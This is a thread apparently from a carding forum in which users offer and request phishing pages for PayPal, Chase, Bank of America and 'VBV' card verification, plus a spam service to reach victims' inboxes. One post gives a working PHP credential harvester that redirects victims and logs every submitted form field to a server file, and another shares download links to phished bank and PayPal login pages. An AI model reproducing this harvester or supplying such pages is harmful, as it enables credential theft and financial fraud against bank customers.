Free Phishing pages for you

growops

Reaction score
Hello all I would like to offer you my services, I can phish any web page you want for free, most of you probz wont need this as I'm sure you already have everything you need but its all I can offer you guys right now. So if you need a page phished just put up a link and I'll post the phished page 5 mins max after reading your post.

maxd0r

BANNED
Reaction score
Please note, if you want to make a deal with this user, that it is blocked.
Hello, do you have a good VBV scam page?

Thanks

octalforty

Professional
Reaction score
i have been looking for a good paypal scam but based in a email submit form that you would fill out within the actual email hit submit and that information would then be sent by email to me, if u can set this up please do

ganiumark

Carder
Reaction score
Can you make a page for chase bank or BOA i would be glad if you can please send me a private message and i would explan what i intend doing

mrX

Carder
Reaction score
i have been looking for a good paypal scam but based in a email submit form that you would fill out within the actual email hit submit and that information would then be sent by email to me, if u can set this up please do

You can put it to create a file in your webserver with all the info gathered by post method.

Like this php file:

Code:
<?php
header("Location: http://www.fakesite");
$handle = fopen("FILE_WHERE_POST_INFO_WILL_BE.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

It'll write all post info on the file

growops

Reaction score
Can you make a page for chase bank or BOA i would be glad if you can please send me a private message and i would explan what i intend doing

Here is chase bank
http://depositfiles.com/files/r8lg12aml

BOA will take more work.

---------- Сообщение добавлено в 10:51 PM ---------- Предыдущее сообщение размещено в 10:45 PM ----------

I see what you mean, how about you get a phished paypal page hosted on the net and direct them to it? It would work better IMO, all the logs are put into a php file that is hosted with the phised page. Here is paypal login page phished for you.

http://depositfiles.com/files/z4wivnv19

---------- Сообщение добавлено в 10:52 PM ---------- Предыдущее сообщение размещено в 10:51 PM ----------

Hello, do you have a good VBV scam page?

Thanks

Check your pm's

godsname

Reaction score
Would anyone be interested in doing a spam service for me, i would provide emails i just need someone who can hit inbox, i'll pay quite well for this. Thanks